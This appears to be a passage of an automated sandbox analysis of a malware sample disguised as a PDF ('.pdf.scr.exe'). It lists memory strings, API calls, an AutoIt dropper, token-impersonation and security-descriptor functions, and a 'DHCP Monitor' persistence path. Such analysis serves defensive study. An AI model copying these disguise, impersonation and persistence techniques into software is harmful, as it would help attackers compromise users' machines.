      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enablewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextwd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getparent
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsystemmetrics
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclientrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setprocessdefaultlayout
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa<charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwm
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwncreatewindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroywindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpoints
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsucopyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw|
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdce
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: messageboxw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisible
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextws
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocus
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyicon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmap
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecaps
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00371A91
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00313312
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037EBB3 mouse_event,2_2_0037EBB3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00371EF3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_003713F2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: itugx.exeBinary or memory string: Shell_TrayWnd
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager8W
      Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
      Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inGetText("Program Manager") = "0" Then
      Source: rnnsh.xls.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\2
      Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*;
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then$
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerD$Fp
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CDAF0F
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF654 cpuid 0_2_00CDF654
